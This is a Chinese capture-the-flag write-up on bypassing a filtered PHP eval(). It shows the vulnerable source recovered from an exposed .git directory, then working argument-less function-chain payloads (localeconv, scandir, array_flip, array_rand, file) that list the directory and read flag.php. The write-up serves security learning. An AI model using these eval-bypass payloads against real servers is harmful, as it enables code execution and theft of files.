首先dirsearch扫到了.git目录,使用git_extract拿到index.php的源码:

    1. <?php
    2. include "flag.php";
    3. echo "flag在哪里呢?<br>";
    4. if(isset($_GET['exp'])){
    5.     if (!preg_match('/data:\/\/|filter:\/\/|php:\/\/|phar:\/\//i', $_GET['exp'])) {
    6.         if(';' === preg_replace('/[a-z,_]+\((?R)?\)/', NULL, $_GET['exp'])) {
    7.             if (!preg_match('/et|na|info|dec|bin|hex|oct|pi|log/i', $_GET['exp'])) {
    8.                 // echo $_GET['exp'];
    9.                 @eval($_GET['exp']);
    10.             }
    11.             else{
    12.                 die("还差一点哦!");
    13.             }
    14.         }
    15.         else{
    16.             die("再好好想想!");
    17.         }
    18.     }
    19.     else{
    20.         die("还想读flag,臭弟弟!");
    21.     }
    22. }
    23. // highlight_file(__FILE__);
    24. ?>

    有三层过滤:

    1. 过滤各种伪协议
    2. 只允许没有参数的函数执行,但是允许函数嵌套
    3. 过滤掉一些敏感函数

    最后中间是一个eval。
    根据以上信息,需要构造出没有参数的函数调用链,来获取flag。
    首先要获取当前目录下的所有文件,可以使用scandir,但是需要一个.来指定当前目录。
    这里就需要第二个函数:localeconvlocaleconv()函数会返回一个包含本地数字及货币格式信息的数组,数组第一项就是.,使用current()函数就可以取到数组的第一个值。
    payload:

    1. var_dump(scandir(current(localeconv())));
    3. array(5) { [0]=> string(1) "." [1]=> string(2) ".." [2]=> string(4) ".git" [3]=> string(8) "flag.php" [4]=> string(9) "index.php" }

    那么接下来就需要想办法获取flag.php这个文件名,这里用到另外两个数组相关的函数:array_fliparray_rand,作用分别是交换数组的键和值、随机去除一个或多个单元。多刷新几次就可以拿到flag.php,然后用file读取。
    payload:

    1. var_dump(file(array_rand(array_flip(scandir(current(localeconv()))))));